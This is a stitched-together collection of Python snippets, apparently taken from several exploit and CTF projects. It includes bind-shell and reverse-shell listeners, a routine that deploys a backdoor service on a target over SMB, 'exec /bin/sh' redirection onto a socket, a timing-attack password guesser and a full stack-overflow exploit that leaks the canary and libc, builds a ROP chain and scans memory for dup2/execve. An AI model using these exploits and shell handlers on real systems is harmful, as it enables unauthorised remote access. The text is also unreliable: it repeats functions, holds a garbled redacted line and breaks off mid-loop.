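def upnpbind(ex_port=None):
    """Expose a local listener through the gateway via UPnP and hand the first
    connection to an interactive Telnet session.

    Discovers an IGD with ``search_device``, binds a TCP socket on the LAN
    address to an ephemeral port, asks the gateway to map ``ex_port`` (or the
    same port number when ``ex_port`` is falsy) onto it, and waits for exactly
    one peer.  The mapping is removed in a ``finally`` so it never outlives the
    session, and both sockets are now closed on every exit path (the original
    leaked the listener if ``add_port_mapping``/``accept`` raised, and the
    peer socket if ``interact()`` raised).

    ``ex_port``: external port to request on the gateway; ``None``/0 mirrors
    the ephemeral local port.

    Security: while the mapping exists the listener is reachable from the
    Internet and the first peer to connect gets the console, with no
    authentication.  Python 2 syntax (``print >>``) as in the original.
    """
    location = search_device()
    in_ip = get_internal_ip_address(location)
    control_url = get_control_url(location)
    ex_ip = get_external_ip_address(control_url)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((in_ip, 0))  # port 0: let the kernel pick a free port
        s.listen(1)
        in_addr = s.getsockname()
        ex_addr = (ex_ip, ex_port if ex_port else in_addr[1])
        print >> sys.stderr, "[+] bind: %r" % (in_addr, )

        add_port_mapping(control_url, ex_addr, in_addr)
        try:
            c, remote_addr = s.accept()
            print >> sys.stderr, "[+] accept: %r" % (remote_addr, )
            s.close()  # single session: stop listening right away

            t = Telnet()
            t.sock = c
            try:
                t.interact()
            finally:
                c.close()  # what t.close() does on success, also on error
        finally:
            # Only reached once the mapping exists; always tear it down.
            delete_port_mapping(control_url, ex_addr)
    finally:
        s.close()  # no-op if already closed; guarantees no leaked listener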
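 def interact(self):
     """Attach an interactive Telnet session to ``self.sock``.

     The socket is handed to the module-level ``close`` helper afterwards on
     every exit path, including when ``interact()`` raises (peer gone, Ctrl-C).

     Fix: the original ``finally`` called ``close(s)`` with ``s`` undefined in
     this method, so every session ended in a ``NameError``; it now closes the
     socket it actually used.
     """
     session = Telnet()
     session.sock = self.sock
     try:
         session.interact()
     finally:
         close(self.sock)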
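def upnpbind(ex_port=None):
    """Expose a local listener through the gateway via UPnP and hand the first
    connection to an interactive Telnet session.

    Discovers an IGD with ``search_device``, binds a TCP socket on the LAN
    address to an ephemeral port, asks the gateway to map ``ex_port`` (or the
    same port number when ``ex_port`` is falsy) onto it, and waits for exactly
    one peer.  The mapping is removed in a ``finally`` so it never outlives the
    session, and both sockets are now closed on every exit path (the original
    leaked the listener if ``add_port_mapping``/``accept`` raised, and the
    peer socket if ``interact()`` raised).

    ``ex_port``: external port to request on the gateway; ``None``/0 mirrors
    the ephemeral local port.

    Security: while the mapping exists the listener is reachable from the
    Internet and the first peer to connect gets the console, with no
    authentication.  Python 2 syntax (``print >>``) as in the original.
    """
    location = search_device()
    in_ip = get_internal_ip_address(location)
    control_url = get_control_url(location)
    ex_ip = get_external_ip_address(control_url)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((in_ip, 0))  # port 0: let the kernel pick a free port
        s.listen(1)
        in_addr = s.getsockname()
        ex_addr = (ex_ip, ex_port if ex_port else in_addr[1])
        print >>sys.stderr, "[+] bind: %r" % (in_addr,)

        add_port_mapping(control_url, ex_addr, in_addr)
        try:
            c, remote_addr = s.accept()
            print >>sys.stderr, "[+] accept: %r" % (remote_addr,)
            s.close()  # single session: stop listening right away

            t = Telnet()
            t.sock = c
            try:
                t.interact()
            finally:
                c.close()  # what t.close() does on success, also on error
        finally:
            # Only reached once the mapping exists; always tear it down.
            delete_port_mapping(control_url, ex_addr)
    finally:
        s.close()  # no-op if already closed; guarantees no leaked listener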
def interact(s):
    """Run a Telnet ``interact()`` loop over the already-connected socket ``s``.

    ``disconnect(s)`` (module-level helper) is invoked unconditionally
    afterwards -- on normal return and on exception -- so the connection does
    not linger once the user leaves the session.
    """
    session = Telnet()
    session.sock = s
    try:
        session.interact()
    finally:
        disconnect(s)
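    def listen(self, port=4444, echotest=False):
        """Generator: open a listener, yield its address, then serve one peer.

        On the first ``next()`` a TCP socket is bound to INADDR_ANY:``port``
        and ``(host, port)`` is yielded, where ``host`` is the resolved
        loopback address when ``self.p`` is a ``Popen`` (local target) and
        otherwise the local address of the ``self.p`` socket.  Resuming the
        generator blocks in ``accept()``, optionally sends ``check_cmd`` and
        echoes the reply when ``echotest`` is set, runs a Telnet
        ``interact()`` loop over the peer and finally calls ``self.close()``.

        Sockets are closed in ``finally`` blocks, so an exception in
        ``accept()``/``interact()`` -- or the caller dropping the generator
        after the yield, which raises ``GeneratorExit`` there -- no longer
        leaks the listener or the peer socket.

        Security: binding to ``''`` listens on every interface and the first
        peer to connect gets the session, unauthenticated; bind to a specific
        address on multi-homed hosts.  Python 2 (str payloads).
        """
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('', port))  # the empty string represents INADDR_ANY
            s.listen(1)

            if isinstance(self.p, Popen):
                addrinfo = socket.getaddrinfo('localhost', port, socket.AF_INET,
                                              socket.SOCK_STREAM)
                host = addrinfo[0][4][0]
            else:
                host = self.p.getsockname()[0]
            yield (host, port)

            c, addr = s.accept()
        finally:
            s.close()  # one session only; also covers GeneratorExit/accept errors

        try:
            if echotest:
                c.sendall(check_cmd + '\n')
                sys.stdout.write(c.recv(8192))

            t = Telnet()
            t.sock = c
            t.interact()
        finally:
            c.close()  # equivalent to t.close() on success, also on error
        self.close()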
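    def listen(self, port=4444, echotest=False):
        """Generator: open a listener, yield its address, then serve one peer.

        On the first ``next()`` a TCP socket is bound to INADDR_ANY:``port``
        and ``(host, port)`` is yielded, where ``host`` is the resolved
        loopback address when ``self.p`` is a ``Popen`` (local target) and
        otherwise the local address of the ``self.p`` socket.  Resuming the
        generator blocks in ``accept()``, optionally sends ``check_cmd`` and
        echoes the reply when ``echotest`` is set, runs a Telnet
        ``interact()`` loop over the peer and finally calls ``self.close()``.

        Sockets are closed in ``finally`` blocks, so an exception in
        ``accept()``/``interact()`` -- or the caller dropping the generator
        after the yield, which raises ``GeneratorExit`` there -- no longer
        leaks the listener or the peer socket.

        Security: binding to ``''`` listens on every interface and the first
        peer to connect gets the session, unauthenticated; bind to a specific
        address on multi-homed hosts.  Python 2 (str payloads).
        """
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('', port))  # the empty string represents INADDR_ANY
            s.listen(1)

            if isinstance(self.p, Popen):
                addrinfo = socket.getaddrinfo('localhost', port, socket.AF_INET, socket.SOCK_STREAM)
                host = addrinfo[0][4][0]
            else:
                host = self.p.getsockname()[0]
            yield (host, port)

            c, addr = s.accept()
        finally:
            s.close()  # one session only; also covers GeneratorExit/accept errors

        try:
            if echotest:
                c.sendall(check_cmd + '\n')
                sys.stdout.write(c.recv(8192))

            t = Telnet()
            t.sock = c
            t.interact()
        finally:
            c.close()  # equivalent to t.close() on success, also on error
        self.close()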
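    def bindshell(self, port):
        """Deploy the bundled bind-shell service on the target and attach to it.

        Uploads ``contrib/srv_bindshell.exe`` under a random ``.exe`` name as
        a temporary service with a random 8-letter name, then retries a TCP
        connect to ``self.__dstip:port`` up to three times one second apart,
        runs a Telnet ``interact()`` loop and removes the service again with
        ``self.undeploy``.

        ``port``: TCP port the bind shell listens on; falsy selects 4445,
        strings are converted with ``int()``.

        Raises ``missingFile`` when the local executable is absent.  Socket
        errors are logged and retried; ``SessionError``, ``KeyboardInterrupt``
        and any other exception during the session are logged.

        Changes: the interpreter version check compares ``sys.version_info``
        instead of the version string (``'2.10' >= '2.6'`` is False as a
        string comparison); ``logger.warning`` replaces the deprecated
        ``warn`` alias; and ``undeploy`` now runs in a ``finally`` once the
        service has been deployed.

        Security: the deployed service is an unauthenticated listener on the
        target -- anyone who can reach ``port`` while it is up gets the shell.
        Guaranteeing ``undeploy`` keeps that window as short as possible.
        """
        connected = False
        srvname = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
        local_file = os.path.join(keimpx_path, 'contrib', 'srv_bindshell.exe')
        remote_file = '%s.exe' % ''.join([random.choice(string.ascii_lowercase) for _ in range(8)])

        if not os.path.exists(local_file):
            raise missingFile('srv_bindshell.exe not found in the contrib subfolder')

        logger.info('Launching interactive OS shell')
        logger.debug('Going to use temporary service %s' % srvname)

        if not port:
            port = 4445
        elif not isinstance(port, int):
            port = int(port)

        self.deploy(srvname, local_file, port, remote_file)
        try:
            logger.info('Connecting to backdoor on port %d, wait..' % port)

            for counter in range(0, 3):
                try:
                    time.sleep(1)

                    # Telnet() accepts a timeout argument from 2.6 onwards.
                    if sys.version_info >= (2, 6):
                        tn = Telnet(self.__dstip, port, 3)
                    else:
                        tn = Telnet(self.__dstip, port)

                    connected = True
                    tn.interact()
                except (socket.error, socket.herror, socket.gaierror, socket.timeout) as e:
                    if connected is False:
                        warn_msg = 'Connection to backdoor on port %d failed (%s)' % (port, e)

                        if counter < 2:
                            warn_msg += ', retrying..'
                            logger.warning(warn_msg)
                        else:
                            logger.error(warn_msg)
                except SessionError as e:
                    # traceback.print_exc()
                    logger.error('SMB error: %s' % (e.getErrorString(),))
                except KeyboardInterrupt as _:
                    print()
                    logger.info('User aborted')
                except Exception as e:
                    # traceback.print_exc()
                    logger.error(str(e))

                if connected is True:
                    tn.close()
                    sys.stdout.flush()
                    break
        finally:
            # Never leave the bind shell running on the target.
            time.sleep(1)
            self.undeploy(srvname)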
	def interact(self):
		"""Drop into a Telnet ``interact()`` loop over ``self.skt``.

		Prints a message and returns ``None`` when ``self.state`` is 0 (no
		connection).  Otherwise attaches a ``telnetlib.Telnet`` to the existing
		socket and blocks until the session ends; the socket is not closed
		here, the owner of ``self.skt`` remains responsible for it.
		"""
		if self.state == 0:
			print "No connection available"
			return None
		from telnetlib import Telnet
		session = Telnet()
		session.sock = self.skt
		session.interact()
		return None
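class TelnetClient:
    """Minimal wrapper around ``telnetlib.Telnet`` for a scripted login.

    Credentials are either set with ``setCredentials`` or prompted for on the
    console in ``connect``.  Telnet carries the user name, password and the
    whole session in cleartext, so use it only on trusted networks.
    ``telnetlib`` is deprecated (PEP 594) and removed in Python 3.13.
    """

    DEFAULT_PORT = 23

    def __init__(self, host, port=DEFAULT_PORT):
        self.host = host
        self.port = port
        self.user = None
        self.password = None
        self.telnetInstance = None

    def areCredentialsSet(self):
        """Return a truthy value when both user name and password are set."""
        return self.user and self.password

    def setCredentials(self, user, password):
        """Store the credentials to use on the next ``connect``."""
        self.user = user
        self.password = password

    def requestCredentials(self):
        """Prompt for the user name and (hidden) password on the console."""
        self.user = input('Ingrese usuario de [%s]: ' % self.host)
        self.password = getpass()

    def connect(self):
        """Open the Telnet session and walk through the Username/Password dialogue.

        Returns ``True`` when a password was sent, ``False`` when only the
        user name was.  Blocks forever if the expected prompts never arrive
        (``read_until`` is used without a timeout).

        Fix: the connection now honours ``self.port``; it previously called
        ``Telnet(self.host)`` and therefore always used port 23.
        NOTE(review): the two prompt/answer lines were garbled in the copy
        this was reviewed from and have been reconstructed as "wait for the
        prompt, send the answer plus newline" -- confirm the prompt strings
        against the target.
        """
        # Ask for credentials if they have not been provided yet
        if not self.areCredentialsSet():
            self.requestCredentials()
        self.telnetInstance = Telnet(self.host, self.port)
        # Consume the stream up to the "Username: " prompt, then answer it
        self.readUntil('Username: ')
        self.executeCommand(self.user)
        if self.password:
            self.readUntil('Password: ')
            self.executeCommand(self.password)
            return True
        return False

    def executeCommand(self, command):
        """Send ``command`` followed by a newline, ASCII-encoded."""
        commandWithLineBreak = '%s\n' % command
        self.telnetInstance.write(bytes(commandWithLineBreak, 'ascii'))

    def readUntil(self, target):
        """Block until ``target`` (ASCII) has been seen on the connection."""
        self.telnetInstance.read_until(target.encode('ascii'))

    def write(self, message):
        """Send ``message`` verbatim (ASCII) without appending a newline."""
        self.telnetInstance.write(bytes(message, 'ascii'))

    def interact(self):
        """Hand the console over to the user for the rest of the session."""
        self.telnetInstance.interact()

    def printSession(self):
        """Read until EOF and print everything received, decoded as ASCII."""
        print(self.telnetInstance.read_all().decode('ascii'))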
def telnetinteract(s=None):
    """Drain whatever the peer already sent, then go interactive over ``s``.

    ``s`` defaults to the module-level ``sock``.  Pending bytes are read one
    at a time (100 ms ``select`` timeout) and passed to the ``printer``
    context manager so any banner is visible before ``Telnet.interact()``
    takes over.  An empty read means the peer closed; draining stops but the
    interactive loop is still entered, as in the original.
    """
    conn = sock if s is None else s
    with printer() as emit:
        while True:
            ready, _, _ = select.select([conn], [], [], 0.1)
            if not ready:
                break
            byte = conn.recv(1)
            if not byte:
                break  # peer closed; could bail out here instead of interacting
            emit(byte)
    from telnetlib import Telnet
    session = Telnet()
    session.sock = conn
    stderr.write('\n' + CYLW + '---telnet interact' + CRST + '\n')
    session.interact()
def telnetinteract(s = None):
  """Drain whatever the peer already sent, then go interactive over ``s``.

  ``s`` defaults to the module-level ``sock``.  Pending bytes are read one at
  a time (100 ms ``select`` timeout) and passed to the ``printer`` context
  manager so any banner is visible before ``Telnet.interact()`` takes over.
  An empty read means the peer closed; draining stops but the interactive
  loop is still entered, as in the original.
  """
  conn = sock if s is None else s
  with printer() as emit:
    while True:
      ready, _, _ = select.select([conn], [], [], 0.1)
      if not ready:
        break
      byte = conn.recv(1)
      if not byte:
        break  # peer closed; could bail out here instead of interacting
      emit(byte)
  from telnetlib import Telnet
  session = Telnet()
  session.sock = conn
  stderr.write('\n'+CYLW+'---telnet interact'+CRST+'\n')
  session.interact()
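def exploit(payload):
    """Connect to ``host:port`` (module globals), send ``payload``, go interactive.

    Reads and discards the service banner, writes ``payload`` plus a newline,
    then attaches a Telnet ``interact()`` loop to the same socket.

    Changes: ``sendall`` replaces ``send`` so a short write cannot truncate
    the payload, and the socket is closed in ``finally`` so an exception in
    ``connect``/``interact()`` no longer leaks it.  Python 2 (``print``
    statement, str payload) as in the original.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((host, port))
        server.recv(1024)  # banner; content unused

        server.sendall(payload + "\n")

        print "[*] Starting"
        t = Telnet()
        t.sock = server
        t.interact()
    finally:
        server.close()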
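    def interact(self):
        """Wait for the reverse-shell connect-back and hand it to Telnet.

        Listens on ``(self._revHost, self._revPort)``, accepts the first peer,
        prints a confirmation and runs ``Telnet.interact()`` over that
        connection.  The listening socket is closed as soon as a peer is
        accepted (or if ``accept()`` fails) and the peer socket when the
        session ends or raises -- the original leaked both on error.

        Security: whoever connects first gets the console; nothing checks
        that the peer is the exploited target.
        """
        from telnetlib import Telnet

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((self._revHost, self._revPort))
            s.listen(5)
            cli = s.accept()[0]
        finally:
            s.close()
        print("[+] Got connect-back")

        t = Telnet()
        t.sock = cli
        try:
            t.interact()
        finally:
            cli.close()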
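    def interact(self):
        """Wait for the reverse-shell connect-back and hand it to Telnet.

        Listens on ``(self._revHost, self._revPort)``, accepts the first peer,
        prints a confirmation and runs ``Telnet.interact()`` over that
        connection.  The listening socket is closed as soon as a peer is
        accepted (or if ``accept()`` fails) and the peer socket when the
        session ends or raises -- the original leaked both on error.

        Security: whoever connects first gets the console; nothing checks
        that the peer is the exploited target.
        """
        from telnetlib import Telnet

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((self._revHost, self._revPort))
            s.listen(5)
            cli = s.accept()[0]
        finally:
            s.close()
        print("[+] Got connect-back")

        t = Telnet()
        t.sock = cli
        try:
            t.interact()
        finally:
            cli.close()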
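def finalExploit():
    """Trigger the overflow and attach an interactive session (module globals).

    Connects to ``(ip, port)``, waits ``st`` seconds between steps, reads the
    menu, sends the ``b"1"`` selection, reads the response and then hands the
    socket to ``Telnet.interact()``.

    Changes: ``sendall`` instead of ``send`` (a short write would silently
    drop the selection) and the socket is closed in ``finally`` -- the
    original never closed it.  ``SO_REUSEADDR`` was dropped: it only affects
    bind() and had no effect on this client socket.
    """
    print("[+] Triggering BOF to get a shell...")
    from telnetlib import Telnet
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))

        sleep(st)
        s.recv(1024)  # menu/banner, discarded
        s.sendall(b"1")

        sleep(st)
        s.recv(1024)  # reply to the selection, discarded
        t = Telnet()
        t.sock = s
        t.interact()
    finally:
        s.close()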
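    def interact(self, shell_fd=None):
        """Echo pending output, optionally exec ``/bin/sh`` on ``shell_fd``, go interactive.

        Whatever ``self.read()`` returns is decoded and written to stdout
        first.  When ``shell_fd`` is given, a green "got a shell!" marker is
        sent as a sanity check and its echo printed, then the target is told
        to ``exec /bin/sh`` with stdin/stdout/stderr redirected onto that
        descriptor.  ``Telnet.interact()`` then runs over ``self.s`` and the
        connection is shut down and closed.

        Fix: the second ``sys.stdout.write(self.read())`` wrote raw bytes to a
        text stream (``TypeError`` on Python 3) while the first decoded; both
        decode now.  ``shell_fd`` is interpolated with ``%d``, so only an
        integer can reach the shell command.
        """
        check_cmd = b'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        buf = self.read()
        sys.stdout.write(buf.decode())

        if shell_fd is not None:
            self.write(check_cmd + b'\n')
            sys.stdout.write(self.read().decode())
            self.write(b"exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" %
                       {'fd': shell_fd})

        t = Telnet()
        t.sock = self.s
        t.interact()
        self.shutdown()
        self.close()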
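    def listen(self, port=0, is_shell=False):
        """Generator: bind a listener, yield its address, then serve one peer.

        The first ``next()`` binds INADDR_ANY:``port`` (0 = kernel-chosen) and
        yields ``s.getsockname()`` so the caller can point the target at it.
        Resuming blocks in ``accept()``; with ``is_shell`` a green
        "got a shell!" marker is sent and the reply echoed, then
        ``Telnet.interact()`` runs over the peer socket, which is closed
        afterwards.

        Sockets are closed in ``finally`` so a failed ``accept()``, an
        exception in ``interact()`` or the caller abandoning the generator
        after the yield (``GeneratorExit``) no longer leaks them.

        Security: ``''`` listens on every interface and the first peer to
        connect wins, unauthenticated.  Python 2 (str payloads).
        """
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('', port))
            s.listen(1)

            yield s.getsockname()

            c, addr = s.accept()
        finally:
            s.close()

        try:
            if is_shell:
                c.sendall(check_cmd + '\n')
                sys.stdout.write(c.recv(8192))

            t = Telnet()
            t.sock = c
            t.interact()
        finally:
            c.close()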
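def main():
    """Answer the running-pace riddle on the remote service, then go interactive.

    Connects to the placeholder address on port 5300, reads up to the
    ``'? '`` prompt (``read_until`` from this module) and, for the line
    containing "I ran", computes minutes per mile from token 2 (miles) and
    token 4 (duration, via ``get_sec``), formats it ``MM:SS minutes/mile``,
    sends it and hands the socket to ``Telnet.interact()``.  The extra
    newline sent after the answer is kept as in the original.

    Changes: ``sendall`` instead of ``send`` (no silent short write) and the
    socket is closed in ``finally``.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(('<address here>', 5300))
        data = read_until(sock, delim=b'? ')
        for line in data.decode('ascii').splitlines():
            print(line)
            if "I ran" in line:
                miles = line.split()[2]
                runtime = line.split()[4]
                min_time = '{0:02.0f}:{1:02.0f}'.format(
                    *divmod(get_sec(runtime) / int(miles), 60))
                pace = str(min_time) + ' minutes/mile\n'
                pace = bytes(pace, encoding='utf-8')
                print('sending:', pace)
                sock.sendall(pace)
                sock.sendall(b'\n')
                t = Telnet()
                t.sock = sock
                t.interact()
    finally:
        sock.close()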
    def wait(self, redirect_fd=None):
        """Drain pending output, optionally upgrade to a shell, then wait.

        For a local ``Popen`` target: when ``redirect_fd`` is given, send the
        green "got a shell!" check, echo the reply and ``exec /bin/sh`` on
        fd 2; then wait for the process and return its exit code.  For any
        other ``self.p`` (a socket): ``redirect_fd`` names the target-side
        descriptor the shell is bound to, a Telnet ``interact()`` loop runs
        over ``self.p`` and ``None`` is returned.  Python 2 (str payloads).
        """
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        sys.stdout.write(self.read())

        local_process = isinstance(self.p, Popen)
        if redirect_fd is not None:
            self.write(check_cmd + '\n')
            sys.stdout.write(self.read())
            if local_process:
                self.write('exec /bin/sh <&2 >&2\n')
            else:
                self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" % {'fd': redirect_fd})

        if local_process:
            self.p.wait()
            return self.p.returncode

        session = Telnet()
        session.sock = self.p
        session.interact()
        session.close()
    def interact(self, redirect_fd=None):
        """Hand the target over to the user, optionally upgrading it to a shell.

        Display is switched off first (``self.setdisplay(False)``) and pending
        output echoed.  For a local ``Popen`` target: when ``redirect_fd`` is
        given, send the green "got a shell!" check, echo the reply and
        ``exec /bin/sh`` on fd 2; then wait for the process.  For any other
        ``self.p`` (a socket): ``redirect_fd`` names the target-side
        descriptor the shell is bound to, and a Telnet ``interact()`` loop runs
        over ``self.p``.  Returns ``None``.  Python 2 (str payloads).
        """
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green

        self.setdisplay(False)

        sys.stdout.write(self.read())

        local_process = isinstance(self.p, Popen)
        if redirect_fd is not None:
            self.write(check_cmd + '\n')
            sys.stdout.write(self.read())
            if local_process:
                self.write('exec /bin/sh <&2 >&2\n')
            else:
                self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" %
                           {'fd': redirect_fd})

        if local_process:
            self.p.wait()
            return

        session = Telnet()
        session.sock = self.p
        session.interact()
        session.close()
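from telnetlib import Telnet

# Interactive Telnet session to the local service on port 5005.
# Fix: the host was misspelt 'locahost', which fails name resolution.
# Telnet is cleartext; telnetlib is deprecated (PEP 594) and gone in 3.13.
tn = Telnet(host='localhost', port=5005)
tn.interact()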
    maxtime = 0
    bestchar = "-"
    for trial in allowed:
        query = known + trial + "U" * (7 - len(known))
        print "Try ", query
        start = time.time()
        sock.send(query + '\n')
        result = sock.recv(1024)
        print("> " + result)
        result = sock.recv(1024)
        print("> " + result)
        end = time.time()
        tt = 1000 * (end - start)
        print "Time = ", tt

        if (tt > maxtime):
            maxtime = tt
            bestchar = trial

    print "Keep ", bestchar
    known += bestchar

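# Submit the recovered password (module-level ``known`` over ``sock``), echo
# the reply and hand the socket to an interactive Telnet session.
# sendall() replaces send() so a short write cannot truncate the guess, and
# the socket is closed even if interact() raises.  Python 2 print statements.
print "Think it's ", known
try:
    sock.sendall(known + '\n')
    result = sock.recv(1024)
    print("> " + result)

    t = Telnet()
    t.sock = sock
    t.interact()
finally:
    sock.close()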

# Connect to the local target, pass the password prompts, leak a libc
# pointer, send the root payload and go interactive.
# NOTE(review): the read_until() line below is garbled -- the literal sent
# after the prompt was redacted to '******' -- and `leakage`, used two
# statements later, is assigned in the missing part.  Restore the original
# send/read pair before running this.
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

skt.connect(('localhost', 65000))

read_until(skt, b'insert the password: '******'\n')

# The leaked value is the hex run between 'your input: 0x' and the 'AAAAA'
# padding; get_libc_base() (defined elsewhere) turns it into the libc base.
libc_base = get_libc_base(
    str(leakage).split('your input: 0x')[1].split('AAAAA')[0])

print("[+] libc base address: ", hex(libc_base))

print("[!] sending root payload")

read_until(skt, b'insert the password: ')

# root_shell() builds the final payload from the libc base.  Plain send():
# a short write would truncate it; sendall() would be the safer call.
skt.send(root_shell(libc_base))

#use telnet to interact
server = Telnet()
server.sock = skt
server.interact()

server.close()
def main():
    """Exploit a stack overflow behind the 'davide' prefix: leak, ROP, shell.

    Every qword written into the 1032-byte buffer is XOR-masked with the
    module-level ``Ds`` (presumably undone on the target) and ``SERVER`` is
    the target address.  Helpers ``leak_n_bytes``, ``p64`` and ``unpack``
    come from this module.  Steps:

    1. Leak the stack canary, saved RBP and return address byte by byte.
    2. Derive the text base (page-align the return address), gadget, PLT and
       GOT addresses from hard-coded offsets, and the buffer address from the
       saved RBP.
    3. ROP ``write(4, write@GOT, 8)`` to leak ``write@libc``.
    4. Scan libc pages downwards, then upwards, from that address: dump each
       page with ``write(4, page, 0x1000)`` and match the opening bytes of the
       ``dup2`` (syscall 0x21) and ``execve`` (syscall 0x3b) stubs.
    5. Final chain: ``close(0); close(1); dup2(4,0); dup2(4,1);
       execve("/bin/sh", NULL, NULL)`` with ``/bin/sh`` placed in the buffer,
       then hand the socket to ``Telnet.interact()``.

    Python 2 (print statements, str payloads).  Offsets are specific to one
    binary build.  NOTE(review): ``except EOFError`` never fires for raw
    socket calls -- they raise ``socket.error`` -- so a dropped connection
    during the scans propagates instead of ending the scan.
    """
    payload = "davide"
    payload += "B" * (1032 - len(payload))

    print "Leaking canary",
    canary = leak_n_bytes(payload, 8)
    print "{}".format(hex(canary))

    print "Leaking old RBP"
    old_rbp = leak_n_bytes(payload + p64(canary ^ Ds), 8)
    print "{}".format(hex(old_rbp))

    print "Leaking return address"
    # Low byte of the return address is supplied (0xcf, masked with 0xd);
    # only the remaining 7 bytes are leaked.
    ret_addr = leak_n_bytes(
        payload + p64(canary ^ Ds) + p64(old_rbp ^ Ds) +
        chr(ord("\xcf") ^ 0xd), 7)
    print "{}".format(hex(ret_addr))

    text_section_base = ret_addr & 0xfffffffffffff000
    text_section_leave_ret = text_section_base + 0xc5c
    buffer_addr = old_rbp - 0x480

    gadget_pop_rsi_pop_r15_ret = text_section_base + 0xf71
    gadget_pop_rdi_ret = text_section_base + 0xf73
    gadget_pop_rdx_ret = text_section_base + 0xb53

    text_section_write_got = text_section_base + 0x202020
    text_section_write_plt = text_section_base + 0x910

    # After leaking the necessary values,
    # We create a new payload
    payload = "davide" + "AA"

    # write(4, write@GOT, 8): rdi = 4 (socket fd), rsi = GOT slot, rdx = 8
    payload += p64(gadget_pop_rdi_ret ^ Ds)
    payload += p64(0x4 ^ Ds)
    payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
    payload += p64(text_section_write_got ^ Ds)
    payload += p64(0x1337)  # pop r15, dont-care
    payload += p64(gadget_pop_rdx_ret ^ Ds)
    payload += p64(0x8 ^ Ds)
    payload += p64(text_section_write_plt ^ Ds)

    # Pad to the end of buffer
    payload += "B" * (1032 - len(payload))

    # Canary, then a fake saved RBP pointing into the buffer so that
    # leave; ret pivots the stack onto the chain above.
    payload += p64(canary ^ Ds)
    payload += p64(buffer_addr ^ Ds)
    payload += p64(text_section_leave_ret ^ Ds)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(SERVER)
    s.recv(4096)  # server hello
    s.send(payload)

    write_libc = s.recv(8)
    print "write@libc:", hex(unpack(write_libc))
    s.close()

    # Libc scan
    libc_page = unpack(write_libc) & 0xfffffffffffff000
    page_size = 0x1000
    # mov eax, 0x21 ; syscall  -- and --  mov eax, 0x3b ; syscall
    dup2_start = "".join(
        [chr(t) for t in [0xb8, 0x21, 0x00, 0x00, 0x00, 0x0f, 0x05]])
    execve_start = "".join(
        [chr(t) for t in [0xb8, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05]])

    dup2_remote_addr = 0
    execve_remote_addr = 0

    # scan down
    print "Scanning down"
    while dup2_remote_addr == 0 or execve_remote_addr == 0:
        try:
            payload = "davide" + "AA"
            payload += p64(gadget_pop_rdi_ret ^ Ds)
            payload += p64(0x4 ^ Ds)
            payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
            payload += p64(libc_page ^ Ds)  # buffer = page
            payload += p64(0x1337)  # pop r15, dont-care
            payload += p64(gadget_pop_rdx_ret ^ Ds)
            payload += p64(page_size ^ Ds)  # length
            payload += p64(text_section_write_plt ^ Ds)
            # Pad to the end of buffer
            payload += "B" * (1032 - len(payload))
            payload += p64(canary ^ Ds)
            payload += p64(buffer_addr ^ Ds)
            payload += p64(text_section_leave_ret ^ Ds)

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(SERVER)
            s.recv(4096)  # server hello
            s.send(payload)

            # A single recv() may return less than a page; a stub split
            # across the boundary would be missed.
            page_data = s.recv(page_size)
            if len(page_data) == 0:
                break

            if dup2_start in page_data:
                dup2_remote_addr = libc_page + page_data.index(dup2_start)
                print "Found dup2 @ {}".format(hex(dup2_remote_addr))

            if execve_start in page_data:
                execve_remote_addr = libc_page + page_data.index(execve_start)
                print "Found execve @ {}".format(hex(execve_remote_addr))

            s.close()
            libc_page -= page_size  # scan down

        except EOFError:
            break

    # scan up
    print "scanning up"
    libc_page = unpack(write_libc) & 0xfffffffffffff000
    while dup2_remote_addr == 0 or execve_remote_addr == 0:
        try:
            payload = "davide" + "AA"
            payload += p64(gadget_pop_rdi_ret ^ Ds)
            payload += p64(0x4 ^ Ds)
            payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
            payload += p64(libc_page ^ Ds)  # buffer = page
            payload += p64(0x1337)  # pop r15, dont-care
            payload += p64(gadget_pop_rdx_ret ^ Ds)
            payload += p64(page_size ^ Ds)  # length
            payload += p64(text_section_write_plt ^ Ds)
            # Pad to the end of buffer
            payload += "B" * (1032 - len(payload))
            payload += p64(canary ^ Ds)
            payload += p64(buffer_addr ^ Ds)
            payload += p64(text_section_leave_ret ^ Ds)

